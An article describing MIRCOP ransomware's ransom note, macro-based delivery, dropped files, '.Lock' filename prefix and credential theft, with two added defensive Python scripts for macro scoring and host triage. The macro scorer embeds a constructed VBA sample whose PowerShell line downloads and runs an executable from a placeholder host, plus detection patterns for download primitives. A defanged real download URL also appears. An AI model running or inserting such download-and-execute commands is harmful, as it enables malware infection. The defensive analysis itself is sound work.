A particularly unusual piece of ransomware was detected earlier this week. The infection was identified as RANSOM_MIRCOP.A, or MIRCOP for short. What makes the program odd is that it casts itself as the victim. There have been other instances of ransomware putting the blame on the user, but those have always posed as some official institution. MIRCOP does not claim any association with a government or federal agency. Instead, the infection poses as an anonymous victim of data theft and treats the user as the criminal.
MIRCOP's ransom note puts the blame on the user and issues a serious threat. The note claims you have stolen 48.48 BTC from the wrong people, and it includes an image of a Guy Fawkes mask, the implication being that you have tampered with the property of a hacktivist group. The people behind the ransomware assume you are already familiar with how such attacks are conducted: the note does not explain how to make the payment, it only lists a bitcoin address, on the assumption that you know how to carry out the transaction yourself.
MIRCOP is harsh in both its judgment and its demands. The ransom of 48.48 bitcoins came to the astonishing sum of $32,949.43 USD as of June 24. The dollar figure moves with the bitcoin exchange rate, which fluctuates like any other currency, but by any measure the sum is very high and ranks among the largest ransoms ever demanded by cyber criminals.
Although MIRCOP leans heavily on psychological pressure, the strategy has not paid off: the attackers' bitcoin address has received no payments to date. The most obvious reason is the size of the ransom. The lack of payment instructions is likely another. The "anonymous" hackers claim to know the person they are confronting, but that claim is far-fetched; since they do not, they will often hit people who have never used bitcoin or made any online transaction of the kind the note expects.
Knowing how MIRCOP is distributed can help you avoid it, and the chain does not vary. The malware arrives in spam e-mail, hidden behind an attached document presented as a Thai customs declaration for the import and export of goods. The document carries a malicious macro which, once it runs, uses Windows PowerShell to download MIRCOP. The macro does not run on its own: text in the document urges the reader to enable macros, and it is that click that hands control to the attacker's code.
When the document is opened and the macro is enabled, it connects to the following page to download the malware: hxxp://www[.]blushy[.]nl/u/putty.exe. The compromised website belongs to an adult sex shop whose pages are available only in Dutch. The filename borrows the name of the legitimate PuTTY SSH client, so do not take it at face value: what is downloaded is the ransomware.
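The delivery chain above (auto-run macro, PowerShell, download of an executable) leaves a recognisable fingerprint in the macro source itself. The following is an added example, not code from the original article or from any vendor: a heuristic scorer for extracted VBA text. It assumes the macro has already been pulled out of the document (macro extraction is out of scope here); both macro samples are constructed for this example and are not MIRCOP's real macro, the download host is a placeholder, and the indicator weights and threshold are assumptions to tune against your own document corpus.

```python
"""Heuristic triage of extracted VBA macro source for a macro-downloader
pattern: an auto-run entry point that launches PowerShell to fetch and run a
payload. Added example, not code from the original article. Samples below
are constructed; the host is a placeholder; weights are an assumption."""
import re


def normalize(src: str) -> str:
    """Undo two cheap tricks macro authors use to split keywords across
    tokens: VBA line continuations (' _' at end of line) and string
    concatenation ("pow" & "ershell"), so the regexes see the command the
    way PowerShell eventually receives it."""
    src = re.sub(r"\s+_\r?\n\s*", " ", src)
    src = re.sub(r'"\s*&\s*"', "", src)
    return src


# (indicator name, pattern, weight). Weights are this example's assumption.
INDICATORS = [
    ("auto-run entry point",
     re.compile(r"\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I), 1),
    ("shell execution",
     re.compile(r"\bShell\b|CreateObject\s*\(", re.I), 1),
    ("powershell launch",
     re.compile(r"\bpowershell(\.exe)?\b", re.I), 2),
    ("hidden window or policy bypass",
     re.compile(r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass|-nop\b", re.I), 1),
    ("download primitive",
     re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient|BitsTransfer", re.I), 2),
    ("URL pointing at an executable",
     re.compile(r"https?://\S+\.exe\b", re.I), 2),
]

SUSPICIOUS_THRESHOLD = 5  # assumption for this example


def score_macro(src: str) -> dict:
    """Return the indicators hit, a weighted score and a verdict for one macro module."""
    text = normalize(src)
    hits = [(name, weight) for name, pat, weight in INDICATORS if pat.search(text)]
    score = sum(w for _, w in hits)
    return {
        "hits": [name for name, _ in hits],
        "score": score,
        "verdict": "suspicious" if score >= SUSPICIOUS_THRESHOLD else "no downloader pattern",
    }


# Constructed sample: the shape of a macro downloader, with the PowerShell
# keyword split across two string literals. Not MIRCOP's actual macro.
MALICIOUS_SAMPLE = r'''Sub AutoOpen()
    Dim cmd As String
    cmd = "pow" & "ershell -w hidden -ep bypass -c " & _
          "(New-Object Net.WebClient).DownloadFile('http://downloads.example.invalid/u/payload.exe', '%TEMP%\p.exe');" & _
          "Start-Process '%TEMP%\p.exe'"
    Shell cmd, vbHide
End Sub
'''

# Constructed benign macro: document automation with no process launch or download.
BENIGN_SAMPLE = r'''Sub FormatTables()
    Dim t As Table
    For Each t In ActiveDocument.Tables
        t.Borders.Enable = True
    Next t
End Sub
'''

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, score_macro(sample))
```

The normalisation step is the part worth keeping even if you replace the patterns: a plain substring search for "powershell" fails on the constructed sample because the keyword is split across two literals, while the normalised text exposes the full command line, the hidden-window flag, the download call and the URL ending in .exe.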
MIRCOP drops three executables in the %temp% folder, each with its own task: c.exe steals information from the system, while x.exe and y.exe encrypt files.
Another unusual trait of MIRCOP is that it marks encrypted files with a prefix rather than a suffix: it prepends the string .Lock to the name of each encrypted file. Tools and rules that spot ransomware by a changed file extension will miss this; match on the start of the filename instead.
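The two host artifacts just described, the three droppers in %temp% and the prefix-marked files, are what an incident responder would sweep for first. The following is an added example, not code from the original article: a small triage script that checks a temp directory for the dropper names and walks data directories for the .Lock prefix. The filenames and prefix are the indicators the article reports; the directory layout it builds is constructed so the script runs offline, and the function names are this example's own. Attackers rename files at will and the article gives no hashes, so a hit is a triage lead, not proof of infection.

```python
"""Host triage for the MIRCOP artifacts: droppers in %TEMP% and files marked
with the ".Lock" prefix. Added example, not code from the original article.
The sample tree built below is constructed (empty placeholder files only)."""
import os
import tempfile

# Droppers the article reports in %TEMP%: c.exe steals data, x.exe and y.exe encrypt.
MIRCOP_DROPPERS = {"c.exe", "x.exe", "y.exe"}

# MIRCOP marks encrypted files by prepending this string, not by changing the extension.
LOCK_PREFIX = ".Lock"


def is_locked_name(name: str) -> bool:
    """True when a filename carries the MIRCOP prefix.

    A conventional extension check (name.endswith(".lock")) would miss every
    MIRCOP victim file; the marker sits at the start of the name."""
    return name.startswith(LOCK_PREFIX)


def sweep(temp_dir: str, data_roots) -> dict:
    """Report dropper hits in temp_dir and prefix-marked files under data_roots."""
    droppers = []
    if os.path.isdir(temp_dir):
        for name in os.listdir(temp_dir):
            path = os.path.join(temp_dir, name)
            if name.lower() in MIRCOP_DROPPERS and os.path.isfile(path):
                droppers.append(path)
    locked = []
    for root in data_roots:
        for dirpath, _subdirs, files in os.walk(root):
            locked.extend(os.path.join(dirpath, f) for f in files if is_locked_name(f))
    return {"droppers": sorted(droppers), "locked": sorted(locked)}


def build_sample_tree(base: str):
    """Constructed layout imitating an infected profile; returns (temp_dir, documents_dir)."""
    temp_dir = os.path.join(base, "Temp")
    reports = os.path.join(base, "Documents", "reports")
    os.makedirs(temp_dir)
    os.makedirs(reports)
    for name in ("c.exe", "x.exe", "y.exe", "unrelated.tmp"):
        open(os.path.join(temp_dir, name), "wb").close()
    # Two prefixed files, one untouched file, and one whose suffix merely
    # looks like a lock marker and which MIRCOP would not have produced.
    for name in (".Lockreport.docx", ".Lockphotos.zip", "notes.txt", "data.lock"):
        open(os.path.join(reports, name), "wb").close()
    return temp_dir, os.path.join(base, "Documents")


def demo() -> dict:
    """Build the constructed tree in a scratch directory, sweep it, and return basenames."""
    with tempfile.TemporaryDirectory() as base:
        temp_dir, docs = build_sample_tree(base)
        result = sweep(temp_dir, [docs])
    return {k: [os.path.basename(p) for p in v] for k, v in result.items()}


if __name__ == "__main__":
    # On a live Windows host you would instead call
    # sweep(os.environ["TEMP"], [os.environ["USERPROFILE"]]).
    print(demo())
```

Note that data.lock is deliberately not reported: the point of the example is that the marker is a prefix, and a rule written for the usual suffix convention would flag the wrong file and miss the right ones.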
Data theft deserves attention in its own right. The credentials stored on your system may be more sensitive than the contents of your files. MIRCOP can harvest saved login details from the Google Chrome, Mozilla Firefox and Opera browsers, which covers your personal and financial accounts, and it also reads stored data from FileZilla and Skype. Even if the encrypted files are restored from backup, every password saved in those programs should be treated as compromised and changed.
In conclusion, the claims in MIRCOP's note are false. The people behind the program know nothing about you or your system, and you owe them nothing. To protect your computer from future attacks, review your e-mail carefully: a great deal of malware is spread through spam. If you have any doubt about a message, do not open its attachments and never enable macros in a document it carries. Verify the sender first: check whether the e-mail address matches the organization it claims to represent, compare it with the contact details on that organization's official website and, if necessary, contact the organization directly.